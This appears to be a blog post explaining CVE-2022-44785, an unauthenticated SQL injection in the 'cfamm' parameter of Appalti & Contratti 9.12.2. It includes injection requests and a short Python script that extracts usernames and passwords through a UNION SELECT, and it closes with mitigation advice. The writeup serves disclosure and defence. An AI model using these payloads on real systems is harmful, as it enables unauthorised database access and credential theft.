CVE-2022-44785 - Appalti & Contratti 9.12.2 SQL Injection Deep Dive

Appalti & Contratti is a software used by several organizations for managing contracts and tenders, especially in public administration. In late 2022, a critical security issue was identified in version 9.12.2 of the product. Registered as CVE-2022-44785, this vulnerability allows for dangerous SQL injections — some of which an attacker can pull off without even logging in.

In this post, we’ll break down what this vulnerability is, show some example code and requests, talk through how attackers can exploit it, and link directly to the original references. If you use this software, or are a penetration tester working with someone who does, you’ll want to read every word.

What is SQL Injection?

SQL injection is a classic security flaw. Simply put, when an application doesn’t properly clean up user input before handling it in an SQL statement, a malicious actor can feed in special input to manipulate the database directly. This could mean:

Where’s the Problem? (The “cfamm” Parameter)

With CVE-2022-44785, several endpoints in Appalti & Contratti 9.12.2 are vulnerable, but one stands out for being accessible *without logging in*:
GetListaEnti.do, via the cfamm parameter.

Example Vulnerable Request

GET /appalti/GetListaEnti.do?cfamm=1234 HTTP/1.1
Host: target-app.example.com
Cookie: JSESSIONID=...

Here, the cfamm parameter is inserted directly into a backend SQL query — without proper sanitization.

How Attackers Exploit the Vulnerability

Let’s illustrate a proof of concept. Imagine the target is at https://target-app.example.com/appalti/.

Normal Request

GET /appalti/GetListaEnti.do?cfamm=1234 HTTP/1.1
Host: target-app.example.com

This might list entities related to ID 1234.

Malicious Request (Classic SQL Injection)

GET /appalti/GetListaEnti.do?cfamm=1234'%20OR%201=1-- HTTP/1.1
Host: target-app.example.com

Here, the attacker breaks out of the intended query and injects their own logic. The %20 is a URL-encoded space, and -- comments out the rest of the SQL statement.

What Happens?

It tricks the backend into returning all rows (or even exposing sensitive data), because 1=1 is always true.

Attackers can extract database values with careful injections. E.g.

GET /appalti/GetListaEnti.do?cfamm=1234'%20UNION%20SELECT%20null,username,password,null%20FROM%20users-- HTTP/1.1
Host: target-app.example.com

If the output shows usernames and passwords, your system is compromised.

Here’s how one could exploit the issue using a basic Python script

import requests

target = "https://target-app.example.com/appalti/GetListaEnti.do"
payload = "1234' UNION SELECT null,username,password,null FROM users--"

params = {'cfamm': payload}
r = requests.get(target, params=params)
print(r.text)  # Should dump sensitive data if vulnerable!

IMPORTANT: Never run such code against systems you do not have permission to test.

Why Unauthenticated? (The Real Danger)

Usually, dangerous endpoints are hidden behind a login — but not here. Attackers don’t need any account. This dramatically increases the risk, allowing automated bots or remote hackers to sweep the internet for vulnerable systems.

Official References and Mitigation

- NIST NVD: CVE-2022-44785
- Exploit Details (Italian Advisory): https://www.swascan.com/it/vulnerabilita-appalti-contratti-acloud/
- Original Vendor Announcement: *(Check your Appalti & Contratti customer portal; general advisories are not always public)*

Conclusion

CVE-2022-44785 is a clear example of how classic web security problems, especially SQL injection, can continue to devastate modern services — especially when unauthenticated endpoints are involved. Patch fast, and always treat user input as hostile!

Timeline

Published on: 11/21/2022 23:15:00 UTC
Last modified on: 11/23/2022 16:01:00 UTC

CVE-2022-44785 - Appalti & Contratti 9.12.2 SQL Injection Deep Dive — Unauthenticated Exploitation Exposed